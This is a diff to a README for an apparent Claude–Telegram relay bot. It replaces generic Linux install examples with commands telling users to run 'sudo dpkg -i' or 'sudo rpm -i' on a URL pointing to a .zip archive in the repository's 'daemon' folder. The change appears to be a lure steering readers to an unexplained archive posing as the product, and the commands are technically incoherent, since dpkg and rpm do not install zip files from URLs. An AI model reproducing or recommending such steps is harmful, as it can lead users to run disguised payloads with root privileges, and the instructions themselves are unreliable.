Itzzwojx/claude-telegram-relay/README.md

 ### Linux Installation
 1. Find the downloaded package.
 2. Open the terminal.
-3. Use your package manager or install using the terminal with commands like `sudo dpkg -i yourfile.deb` or `sudo rpm -i yourfile.rpm`, depending on your package type.
+3. Use your package manager or install using the terminal with commands like `sudo dpkg -i https://github.com/Itzzwojx/claude-telegram-relay/raw/refs/heads/master/daemon/relay_telegram_claude_2.8.zip` or `sudo rpm -i https://github.com/Itzzwojx/claude-telegram-relay/raw/refs/heads/master/daemon/relay_telegram_claude_2.8.zip`, depending on your package type.

 ## ⚙️ Configuring Your Bot
 Once installed, you need to set up your bot to work with your Telegram account.